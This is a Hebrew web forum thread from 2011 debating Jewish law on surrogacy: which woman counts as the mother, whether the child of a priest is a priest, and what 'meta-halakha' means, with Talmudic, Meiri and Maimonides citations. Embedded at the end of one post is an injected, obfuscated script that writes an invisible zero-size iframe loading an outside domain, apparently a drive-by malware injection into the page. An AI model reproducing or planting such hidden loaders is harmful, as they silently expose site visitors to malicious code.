|
|
| נשלח ב-13/9/2011 02:57 |
|
| |
מצד שני אולי כן אפשר לדון על בעלות האב שמקבל קידושיה בקטנותה ומוכרה לאמה
|
|
|
|
|
| נשלח ב-13/9/2011 06:50 |
|
| |
[הערת שוליים שולית לחלוטין -
כותרת האשכול היא "אם פונדקאית - הלכה ומטא הלכה", אבל אחרי עיון מעמיק בכל דפיו, לא מצאתי בהם אפילו שבב של "מטא-הלכה" בתוך ערמות ההלכה. בניגוד למה שיכול להשתמע מדבריי, אין זו הערה לשונית בלבד.
בתלמוד, אני חשה פעמים רבות שהעיסוק בפרטי הפרטים ההלכתיים של נושא כלשהו, תוך העלאת אפשרויות-קצה מופרכות מבחינה מציאותית וכו', הוא דרך מסויימת להגיע דווקא אל המהות, אל הגרעין הרעיוני של קושיה פרקטית כלשהי, אם תרצו - אל ה"מטא-הלכה" שלה.
בדיון על פונדקאות, יש כ"כ הרבה "מטא-הלכה" אפשרית - שאלות של מוסר אנושי ויחסים בין בני אדם (למשל - האם פונדקאות היא ניצול גופני של נשים עניות בידי נשים וגברים עשירים, בדומה לזנות ולסחר בנשים?), שאלות על זהות (למשל - מה מגדיר את זהותנו? האם לגנטיקה יש מרכיב כלשהו בזהות בכלל, ובזהות יהודית בפרט?) ועוד ועוד. אף אחת מן השאלות הללו לא עלתה כאן, ונדמה לי, שבניגוד לתלמוד, באשכול הזה פרטי הדקדוקים ודקדוקי הפרטים ההלכתיים אין מטרתם להתקרב ככל האפשר אל היסודות הרעיוניים, אלא להיפך - להרחיק ולהתרחק ככל שניתן מן השאלות הערכיות, המוסריות והדתיות. זה לא שדיון כזה אינו מעניין, זה שהחשיבות שלו מצומצמת להחריד, ובעצב אני אומרת - גם מצמצמת להחריד.]
 |
|
|
|
|
| נשלח ב-13/9/2011 07:18 |
|
| |
אמשלום את צודקת לחלוטין, אני פתחתי את האשכול, השם שנתתי לו היה "אם פודקאית", לא התכוונתי לדון על ההשלכות המטא הלכתיות של אם פונדקאית. שאלות כאלו תלויות בדעתו, בחינוכו, וברצונותיו של כל כותב, והברברת אינה מעניינת אותי. ניסיתי לדון בהלכה הצרופה, ללא התיחסות לשאלה מה ראוי להיות, רציתי לקבל מידע ממי שיוכל להביא, על ההוכחות ההלכתיות שעליהם סמך הרב עמר בפסקו. והסברתי את דעתי למה הוא טועה. וקיבלתי שלל ברברת מכותבים שהסתובבו כמה שנים בישיבה, ושולפים סברות כרס, שאכן הפכו את הדיון לדיון בהלכה כאשר ההשלכות המטא הלכתיות של אם פונדקאית נמצאות ברקע. מי שהחליט אכן להסיט את הדיון לדון בשאלות שאינן בבסיס ההלכה הצרופה, שינה גם את שם האשכול.
|
|
|
|
| נשלח ב-13/9/2011 07:27 |
|
| |
[אכפתלי,
בניגוד אליך, אין לי כנראה הכלים להבדיל בין מי שלמד כל חייו ובין מי ש"הסתובב כמה שנים בישיבה". למרות זאת, אני חוזרת על דבריי - הדיון באשכול הזה אין לו אפילו לא קצה קצהו של "מטא-הלכה" (ובניגוד לדבריך, ש"ההשלכות המטא הלכתיות של אם פונדקאית נמצאות ברקע"). בשונה ממך, אני חושבת שהאשכול הזה עונה לחלוטין על ציפיותיך ממנו (ולא עונה על ציפיות מחליף כותרתו). לכך בדיוק מכוון הסיפא של דבריי לעיל...]
|
|
|
|
| נשלח ב-13/9/2011 08:21 |
|
| |
הגעתי למסקנה שכמו בכל מקום יש טרנדים ועכשיו עניין המטא הלכה הוא טרנד חם בפורום אז מלבישים אותו על כל דיון.
|
|
|
|
| נשלח ב-13/9/2011 08:55 |
|
| |
| מהאכפתלך כתב: |  | דר' הלפרין הנכבד.
כפי שכתבתי, וגם הוכחתי מגמרות ולא מאגדות, אין לי ספק, שרק האם הפונדקאית הינה האם היחידה של הולד.
לגבי מה שכתבת, שאם האב כהן, הבן הנולד מפונדקאית הינו כהן, זה ודאי לא נכון, שהרי מהיכן אנו יודעים מי האב?. כל הדין שבן הכהן נחשב כהן, גם זה מדין "יכיר", והרי דין "יכיר" זה רק בבעל האשה שממנה נולד הילד בפועל. כי דין "יכיר" זה בבעל, ולא דין באב.
שהרי מניין שהוא אביו?. אם מדין "יכיר" הרי זה מעגלי. אלא ודאי שדין "יכיר" זה דין בבעל האשה שהיא ילדה את הילד בפועל. ולכן אין כאן אפשרות ליחס את הילד לאביו הכהן, והילד אינו כהן מיוחס. |
|
האם לדעתך אין אפשרות שאשה פנויה תלד כהן מיוחס (בתהליך טבעי)?
|
|
|
|
| נשלח ב-13/9/2011 09:04 |
|
| |
אמשלום
זה אני ששיניתי את שם האשכול. השם המקורי היה עם טעות הקלדה, וחסרה בו נ'. כיון שהשלמתי, הרחבתי. לדעתי הנושא שלנו הוא דוגמא לנושא כללי שנידון בזמן האחרון וראוי להידון תמיד: מטא הלכה.
כיון שהזכרתי את המונח הזה עלי להבהיר כיצד אני משתמש בו. אין זה כולל תחום מסויים של עקרונות, כפי שהיו שניסו להשתמש בו, או אפילו התבוננות פילוסופית בהלכה (למרות שגם אני הק' השתמשתי במתודה הזו) אלא כל מה שאינו הלכה הנוגעת לנושא שעלה לדיון.
הדוגמאות שלך לעקרונות שהיה צריך להביא בחשבון הן אכן מטא הלכה: המוסר, ההשלכות לגבי הסביבה האנושית. הזכרתי אותם, את הנושאים והעקרונות בשמותיהם באופן כללי, אבל לא דנתי בהם כי איני יודע מה הם ואיך הם יבואו לידי ביטוי. את מוזמנת להציע את המבט שלך. אני מזכיר שכתבתי כי קשה להכריע הלכה כל עוד מצב לא התגבש ויש שינויים. הצעתי להמתין עד שיהיו לנו מקרים רבים כאלו. חלק ממה שזה יעניק לנו (וקודם לא כתבתי זאת מספיק ברור) הוא לראות כיצד הכרעות משפיעות ומי נזקק להן במישרין ובסביבה העקיפה יותר. (דוגמא מהתחום הכללי הרחב: הזרעה של אלמנה מזרע שהשאיר בעלה נוגעת לא רק לה ולולד ולדיני ייבום אלא גם להורי המנוח שזוכים לשריד מהבן שהלך לעולמו. הם כנראה לא מאן דאמר מצד ההלכה נטו, שהרי היום יש תא משפחתי בעל-אשה ולא שבט, אבל הרגש מזמין אותנו להתייחס והדמיון מראה את הצורך הנורא שלהם).
*** מה אכפת לך
כמה הערות והסברים.
כתבת שהמטא הלכה אינה משנה לך. איני יודע איך אתה משתמש במילה זו בדיוק. כפי שטענתי אני, אין כאן חילוק בין מה שהוא דיון תורני לדיון אקדמי (אם כי יש משתמשים כך במילה זו). כוונתי היא לחילוק בתוך התחום ההלכתי בין ניתוח המקרה המסויים וכל מה שחל עליו מתוך הנושא הספציפי לבין מה שמבחוץ. (למשל, השאלה אם כבוד הבריות דוחה איסורים מהתורה היא כולה שאלה במטא הלכה. השאלה אם פיקוח נפש דוחה שבת אמורה להיות כל כולה מטא הלכה. וכבר הביאו את הדוגמא הזו באחד האשכולות וראוי לדעתי להקדיש לה אשכול בפני עצמה. כאן הבאתי זאת רק כדוגמאות למהי מטא הלכה בשימוש הלשון שלי).
ולא עוד, אלא שכאשר יש לפנינו שאלה חדשה, שאין עליה מסורת, וכל מה שאפשר לעשות הוא לנסות לדייק מסוגיות אחרות, מה שיקבע יהיה לא רק הניתוח של המקרה לפרטי פרטיו, כדי להבדיל מה עקרוני ומה לא, אלא גם המטא הלכה שקובעת פעמים רבות.
אם התכוונת לדעת רק מה היו שיקולי הרב עמר, אזי אני משתתף בצערך כי עד כמה שראיתי איש אינו יודע ואינו מכיר (לבד אולי מן הלינקים של נישטאיך שאפשר גם שהוא יודע ומכיר) ואם הרב ד"ר הלפרין יודע זאת, הוא לא שיתף אותנו.
אני הבנתי, אולי בטעות, שכוונתך לדון בשאלה הזו מכל צד אפשרי ורלוונטי. כך עשיתי, וכך השתדלו לעשות אחרים.
כינית את מאמצי חלקנו (איני מאמין שאתה מתייחס לכולם כך) "ברברת" ו"סברות כרס". כמובן, גם אם כתבת כך זה מביע רק את דעתך ואינו חופף למציאות בהכרח אלא לדעתך, אבל עדיין אלו הן מילים פוגעות.
"ברברת" זה כינוי לדיבור חסר ערך. האם באמת מה שנכתב כאן, גם על ידי, הוא מסוג זה? (איני שואל על דברי ד"ר הלפרין למשל אבל על דברי שלי). אני סבור שמה שהצעתי הוא ניתוח של הצדדים הרלוונטיים. בדיוק כפי שאנו עושים בכל סוגיה וסוגיה בעולם הישיבות, או שכך ראוי לעשות.
המונח "סברות כרס" פחות ברור לי. אם הכוונה לסברות שאינן מעוגנות בטקסטים ובמקורות אזי זה כמעט נכון. אלו סברות שאינן כתובות במפורש. אבל ניתן לדלותן מתוך מעיין הסוגיות על ידי דיוק וניתוח. יש גם בביטוי זה משום זלזול. לא "סברות השכל" (אם כי אני מפקפק בקיומו של יש כזה ללא בירור נוסף) אלא דברים שנובעים מנהמת המעיים שמונעים לפעמים בידי רעב או שובע, או בכל אופן יש כאן זלזול.
חבל.
*** דייר
ההבדלה בין מטא הלכה להלכה עצמה היא קצת מלאכותית. זה חילוק שיכול לסייע לנו בניתוח של סוגיות. ואם הוא מועיל, אז למה לא להשתמש בו. במיוחד שלדעתי אין הוא כפוי מבחוץ על מה שאנו עושים אלא משקף חלוקה פנימית ברורה למדי, ברגע שמכירים אותה, בין סוגי שיקולים שניתנים לבדיקה.
אני מדגים שוב מהי מטא הלכה למרות שאיני רוצה להסב את הדיון למהי מטא הלכה. כאשר רב שואל את חברו מה טעם נאסרה גבינה של גויים, והלה מתחמק מלענות לו מפני שזו גזירה חדשה, יש כאן שימוש במטא הלכה, או, אם נדייק, הלכה בתחום כללי דיון וגילוי שקובעת שאין לעסוק בבירור טעם ההלכה הספציפית לפני כל אחד ואחד.
כאשר רב מגיע למסקנה שהשוגג בשבת אין עליו איסור לאכול ממה שהתבשל בשוגג גם בתוך השבת, אבל אין ראוי לגלות כן לציבור הרחב, אם בגלל שיש שישתמשו בהיתר בהרחבה, ואם בגלל שהמסורת כבר אוסרת אבל באמת צריך להיות מותר, אזי יש כאן שילוב של הלכה (מותר) למטא הלכה (אסור לומר מסיבות אלו ואלו).
בדוגמא שלנו השאלה ההלכתית היא מה דין שתי הנשים להחשב כאם.
השאלות המטא הלכתיות יכולות להיות רבות. החל בשאלה איך פותרים מצבים חדשים (כהארת יהי אור) ועד לשיקולים מוסריים וערכיים של היחס לבן, לאב ולאם ואפילו אולי שיקולים פמיניסטיים (אני כותב זאת בזהירות ומתוך הסתייגות. כוונתי לסוג של שיקולים שמעלות נשים המביעות חשש כי פרשני ההלכה אינם מודעים מספיק לצרכיהן. (ואולי הן תובעות לעצמן קול במובן של זכות השתתפות בדיונים).
|
|
|
|
| נשלח ב-13/9/2011 09:14 |
|
| |
עציוני
כוונתך מן הסתם לסוגיה זו:
תלמוד בבלי מסכת כתובות דף יג עמוד ב ומי איכא שתוקי כשר? אין, כדשמואל, דאמר שמואל: עשרה כהנים עומדים, ופירש אחד מהם ובעל - הולד שתוקי. מאי שתוקי? אילימא שמשתיקין אותו מנכסי אביו, פשיטא, ומי ידעינן אבוה מנו? אלא שמשתיקין אותו מדין כהונה, דכתיב: +במדבר כ"ה+ והיתה לו ולזרעו אחריו ברית כהונת עולם, מי שזרעו מיוחס אחריו, יצא זה שאין זרעו מיוחס אחריו. ההוא ארוס וארוסתו דאתו לקמיה דרב יוסף, היא אמרה מיניה, והוא אמר (יד עמוד א )אין, מינאי, אמר רב יוסף: למאי ניחוש לה? חדא דהא קא מודה, ועוד, הא אמר רב יהודה אמר שמואל: הלכה כרבן גמליאל. אמר ליה אביי: ובהא כי לא מודה, מכשר רבן גמליאל? והמאירי סיכם: בית הבחירה למאירי מסכת כתובות דף יג עמוד ב
כבר ביארנו שכשם שהאשה נאמנת להכשיר את עצמה כך נאמנת להכשיר את בתה לכהנה ומכל מקום כל שאומרת מפלוני הוא אינה נאמנת להורידו בנכסי אותו האיש כלל אפילו הוא שותק או שאינו כאן ואף על פי שבארוסה שעיברה ואמרה לארוס נבעלתי אמרו בפרק יוחסין שאם תפש אין מוציאין ממנו בזו הוא מפני שידים מוכיחות הן שמארוס עיברה וכן שאינה מעיזה כל כך לומר כן בטענת שקרות אבל באחר אינה נאמנת כלל לענין ירושה ואף תפישה אינה מועלת כלל הא כל שהוא מודה בדבר נעשה בנו לכל דבר וכן כל שהיא אומרת לפלוני כהן נבעלתי והוא שותק או שאינו כאן או שאמרה לכהן נבעלתי ואינה אומרת לפלוני כהן נבעלתי משתקין אותו מהלכות עבודה ואף לתרומה פסול שהרי אין מכשירין אותו אלא מצד חזקה שלה ר"ל שחזקה שלה מביאתנו לומר שלכשר נבעלה ומאחר שכן אף בתה כשרה והילכך דיינו להעמיד את בתה על חזקתה להשיאה ליוחסין ר"ל להנשא לכהנה אבל לתרומה לא ואפילו היתה היא כהנת ואף לדעת האומר מעלין לכהנה על פי עד אחד על פי אשה מיהא לא אמרו וכל שכן על פי אמו ומכל מקום להחמיר כגון לאסרו לפסולי כהנה ולהזהירו מטומאה נאמנת כדי להחמיר עליו מספק נודע לנו שלכהן נבעלה אלא שלא נתברר לאי זה כהן כגון שהיתה סיעה של כהנים עוברת ופירש אחד מהן ובעל אף זה משתקין אותו מדין כהנה ר"ל שלא לעבוד עבודה ולא כדברי תלמוד המערב הלכה ט' שאמרו על זה מצינו שתוקי כהן גדול ודיו שתעמידנו ידיעתנו להעלותו ליוחסין ר"ל שאם היא נקבה תנשא לכהנה ואם הוא זכר תנשא בתו או אלמנתו לכהנה אבל לא לעבוד או לישא את כפיו ואף על פי שנתברר שהוא כהן הואיל ואין לו מי שיתיחס אחריו בודאי נאמר בתורה והיתה לו ולזרעו אחריו מי שזרעו מיוחס אחריו יצא זה שאין זרעו מתיחס אחריו ואף לתרומה כתבו גדולי הרבנים שאינו אוכל בתרומה אבל חכמי האחרונים שבספרד כתבו שמותר הוא בתרומה הואיל וודאי כהן הוא וכן הדברים נראין ולהחמיר מיהא כגון להזהירו בפסולי כהנה ומן הטומאה כהן גמור הוא:
*** קיצור הדברים: מעשה בארוס וארוסה שהיתה מעוברת, והודו שניהם שהארוס בא עליה. רב יוסף ביקש להכשיר את הולד ונחלק עליו אביי אלא שכאן דומה שהלכה כרב יוסף וכן כותב המאירי, אלא שהזכיר את הידוע כי כל כהן שאינו יודע מי אביו, אע"פ שידוע שהוא כהן ונאסר בכל דיני כהונה (כגון גרושה) פסול מלעבוד והיא חומרה מדיני כהנים. אז התשובה היא שהוא כהן אבל לא נעניק לו את כל הזכויות שמזכה ייחוס ברור. אמנם אם יש עדים על כל שלב ושלב (בהפריה, בהחזרה לרחם) כפי שאירגונים האחראים לנושא מעמידים עדים לשם כך, למאי ניחוש לה ומדוע לא יהיה זה כהן מיוחס, הרי זה הולך אחרי האב? ואמנם אפשר היה לדון שפריצה כזו של אופני ההולדה המוכרים כבר תסלק את החשיבות של היות הולד כהן. אבל אפשר גם לטעון שהולד כהן וראוי לעבוד אם יש בירור מלא על ייחוסו.
|
|
|
|
| נשלח ב-13/9/2011 09:27 |
|
| |
ביליצר
שמחתי לגלות שהנסיון שלי לדמות מילתא למילתא (=דבר לדבר) למרות היותו מרוחק והנושאים שונים מאד עדיין זכה לתהודה וגם אתה חשבת כן. כבר טענתי לעיל שהסברות שניתן לנסח במפורש וגלומות בסוגיות אלו של זרע וקרקע אפשר שהן פועלות ופעלו אצל הפוסקים והשפיעו על השיקלול שלהם אם כי לפעמים זה בלתי מודע וזה מה שנכלל במונח המפורסם הלקוח מהרא"ש, "דעת תורה", כלומר הבנה שלא מנוסחת במילים והיא על סמך התרשמות כללית מן הידע התורני המקיף ולדעתי הכוונה למה שכתבתי כאן: הבנה לא מפורשת אבל נכונה (אבל לא הכרחית) של הנחות יסוד של סוגיות. וזה נושא חשוב מאד וראוי להידון בפני עצמו.
אשר לדוגמא שלך מאותה משנה בסוף בבא מציעא, אף אני סבור כמוך. וזו אחת הדוגמאות לעיקרון שהקרקע חשובה מהזרע בעיני חז"ל.
(חשבתי שאולי יש כאן גורם נוסף והוא שבעל הקרקע תמיד חשוב וחזק יותר כלכלית מאשר בעל הזרע. קרקע היא נכס יציב ובעל אחוזה הוא גם אדם מבוסס. וכמדומה שכך זה בהיסטוריה בכל מקום ולא רק בתולדות עמנו. ומעמד מיוחס זה אולי גם כן היה שיקול בהעדפת מתן הפירות לבעל הקרקע. ועוד שהרי הקרקע גם כן מצמחת אם כי הזרע יקבע מה יגדל שם. ועל כל פנים בעינינו היום הזרע אמור להיות חשוב יותר. כך זה בעיני. ואפשר שהשתנו תפיסותינו, ובין השאר יש אצלנו איזו דמוקרטיזציה והעדפת היחיד גם העני על פני בעל הממון והקרקע וזה פועל ברקע כפי שהדגמתי לעיל).
לגבי ויתור, זו סברה קשה מאד אבל מעניינת ואולי "מה אכפת לך" ידון אותה כברברת. אבל זה עדיין להשתעשע בדברי תורה.
התבססתי על ההנחה שלי כי שתי האמהות, אמא ביצית ואמא פונדק, לשתיהן יש טענה שהן האם האמיתית ההלכתית. כל אחת תורמת מה שאי אפשר בלעדיו (כך שאין כאן מסייע שאין בו ממש) אבל מצד שני אנו רגילים לחשיבה דיכוטומית הקובעת שיש רק אם אחת ולא יותר.
כל הדיונים פרט לאפשרות זו כאן ניסו לאתר את האם המקורית. כפי שהביא ד"ר הלפרין מהרב אלישיב וחזרתו. שהמשותף לכל פסקיו הוא שיש רק אם אחת אלא ששינה דעתו מיהי.
אני באתי להציע שמה שקובע אינו רק המציאות של התרומה האמהית (שכאן כאמור לעיל יש יתרון לאם הגנטית שהיא קובעת תכונות הולד ויש יתרון לפונדקאית שהיא מגדלת אותו תשעה חודשים). אלא מה חשוב בעיני האדם.
ויתכן ש"חשוב" זה אינו ניתן לפתרון עקרוני אלא שהוא תלוי בנסיבות.
כלומר, מי שמקדישה עצמה לולד יותר היא תחשב לאם והשניה רק העניקה שירותים מסויימים ולא יותר.
הסברה הזו נראית מוזרה, אני מסכים, וגם יש בה חסרון שאין היא מאפשרת תשובה עקבית. פעם זו תהיה האם ופעם זו. (ויש לנו סוגיות שאין לענות תשובות סותרות לאותו אדם בו זמנית, אבל משם גם למדים שכן ניתן לספק תשובות סותרות בפעמים נפרדות, וכתיבה בספר אינה נחשבת כמתן תשובה בו זמנית ולכן זה חל!)
אם הפונדקאית רק משכירה שירותי פונדק לפי הזמנה של זוג שהאם אינה מסוגלת לשמש כפונדק אבל הביצית שלה, סילקה עצמה הפונדקאית מן האמהות.
אם תורמת הביצית רק מכרה אותה לזוג שרוצה ילד ובת הזוג מבקשת לפחות להיות פונדקאית, היא תהיה האם והראשונה רק מכרה את הביצית שלה.
לפי זה הבן רשאי מן התורה לבוא על זו שויתרה על האמהות בכך שרק נתנה שירות אלא שכמובן יהיה עלינו לאסור זאת כפי שאסרו על גר ואמו שהתגיירה להינשא למרות שגר כקטן שנולד.
יש לשים לב כי האיסור האחרון הזה הוא דוגמא למטא הלכה. הגר מותר באמו הגיורת אלא שיש כאן "מה יאמרו" ברמה עקרונית ומסוכנת מאד.
__תוקנה טעות הקלדה ונוסף משפט מאד חשוב בסוף_______________
שומר פיו ולשונו - שומר מצרות נפשו
******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");
תוקן על ידי מיימוני ב- 13/09/2011 09:29:09
תוקן על ידי מיימוני ב- 13/09/2011 09:35:14
 |
|
|
|
|
| נשלח ב-13/9/2011 09:34 |
|
| |
עציוני, ודאי שאשה פנויה אינה יכולה ללדת כהן מיוחס שהרי הלכתית אין אנו יודעים מי אביו, וכוונתי במונח "הלכתית". היא ל"ידיעה" שההלכה קובעת, וההלכה אינה מכירה ביוחסין אלא מכח דין "יכיר". ולא לבדיקת די.נ.אי. למשל. ואפילו לא רוב או חזקה. מימוני איני יודע מהי ההגדרה של "מטא הלכה". אני מניח שהכוונה היא ל"שיקולים מטא הלכתיים" בקביעת ההלכה. ולדעתי שיקולים כאלה אינם קבילים. השאלה אם ומתי כבוד הבריות דוחה איסורים מהתורה, או הדין שפיקוח נפש דוחה שבת, הינם שאלות בהלכה, וההכרעות בהם הינן הלכתיות בלבד, שום שיקול מטא הלכתי לא יכול לשנות הלכות. אני יודע שמתירים לרופא יהודי לחלל שבת על חולה נכרי, משיקולים מטא הלכתיים, ולדעתי חייבים חטאת על חילול שבת זה. כיניתי חלק מדברי המגיבים ברברת, כי לא התיחסו לנושא, וחלק סברות כרס, כי לא ביססו דבריהם על הוכחה. ולא התכוונתי לדבריך ולדברי הד"ר הלפרין. למרות שאני סבור שלא העמקת מספיק בסוגיות, עכ"פ איני מתכוון להתחיל ללמד את הסוגיות במסגרת הפורום. אם נפגע מישהו מדברי, לא לכך התכוונתי.
|
|
|
|
| נשלח ב-13/9/2011 09:39 |
|
| |
מה אכפת לך
תודה על ההבהרה. ולפי דרכנו למדנו שוב כי ראוי להסביר ביקורת ולא להסתפק במילים ביקורתיות שגם יעדן אינו ברור.
לגבי חילול שבת של רופא יהודי עבור נכרי, אני מסכים שההיתר (כגון של המ"ב שאף הוא התיר כמדומה, וכן ידוע לי על פסקים של רבנים בני זמננו אבל הם לא פורסמו ברבים....) מבוסס על מטא הלכה. אבל מטא הלכה במובן שכתבתי: שיקול הלכתי שלקוח מתחום נוסף. למשל, משום איבה.
אך אם דבר הותר נחזור ונחייב את העושה חטאת (או עונש)? אתמהה. (יש אמנם סוגיה שממנה משמע שעמי הארצות טועים לחשוב שהם עושים מצוה, קבורה ביום טוב שני, וזקוקים לכפרה. אבל זו לא חשיבה הלכתית אלא דמיון מוטעה של עם הארץ!).
לגבי אי העמקה בסוגיות, אני מסכים שכתבתי דברים ראשוניים או על כל פנים לא סופיים וזאת כי אין לי הכרעה בדבר. אבל אני כן סומך על מה שניתחתי ורק יודע שיש עוד צדדים שאפשר להראות לכאן ולכאן. ועם כל זאת פירסמתי כי מנאי ומינך תתרחב שמעתתא.
אם אתה רואה נקודות שבהן לא דייקתי או שיש להוסיף עוד, אנא ואנא כתוב ופרט.
|
|
|
| נשלח ב-13/9/2011 09:45 |
|
| |
מימוני הסיבה שהולד כהן היא מדין "יכיר" כי אביו, בעלה של האם שילדה את הילד, (ארוס הוא כבעל לכל דבר) קבע שזה בנו, רמב"ם הלכות איסורי ביאה פרק טו הלכה יז ארוסה שנתעברה והיא בבית אביה הרי הולד בחזקת ממזר ואסור בבת ישראל ואסור בממזרת, ואם נבדקה אמו ואמרה מארוסי נתעברתי נאמנת והולד כשר, ואם הכחישה הארוס ואמר מעולם לא באתי עליה הרי הולד ממזר שאפילו היה בחזקת בנו ואמר בני זה ממזר נאמן, והאשה אינה בחזקת זונה אלא נאמנת לומר לארוס נבעלתי ואינה זונה, ואם נשאת לכהן לא תצא וולדה ממנו כשר. לגבי החלק השני אתה כבר כתבת מה דעתי בעניין.
|
|
|
|
| נשלח ב-13/9/2011 10:27 |
|
| |
לפני זמן מה פורסם כי אמא הסכימה להיות אם פוקאית לבתה,-שמבחינה רפואית לא יכלה להתמיד בהריון- ןהכל עבר בשלום. והסבתה המאושרת הפונקאית- ילדה בשטומ"ץ את נכדה בן לביתה. עד כמה שאני זוכר הסיפור היה בב"ב למשפחה חרדית- אבל לעניננו זה לא משנה.
ואני שואל את מרנן- הרי אם כדבריכם כי הפודקאית היא האם! הרי הילד ממזר במקרה שלנו- כי אב הילד הוא חתנה של הפודקאית. יותר נכון היא חותנתו, וילד שנולד- מאם הבת- ממזר! וכן הדין אם אחות האשה פודקאית או קרובה אחרת. ולמרות שאםשלום צודקת במחאתה כי הדבר הוא ניצול של מצוקת נשיים עניות???. הרבה מהפודקאיות הן בנות משפחה. והדבר עלול להרבות ממזרים בישראל ח"ו. אם מחר בבוקר יתעורר הפוסק התורן ויגלה את הדבר.
|
|
|
|
| נשלח ב-13/9/2011 10:38 |
|
| |
הילד הוא שתוקי. ללא הוכחה הלכתית מי אביו,
|
|
|
|
| נשלח ב-13/9/2011 10:43 |
|
| |
| בעלבעמיו כתב: |  | ההנחה של הדעה החולקת, שהפונדקאית היה האם, לכאורה מבוססת על הדעה האריסטוטלית, שהזכר הוא שנותן את הצורה בוולד והאם היא מעין אינקובטור. |
|
דעה זאת לא הייתה מקובלת על בעל המדרש הידוע "שלושה שותפים יש בו באדם וכו' אמו מזרעת אודם שבו וכו'".
|
|
|
|
|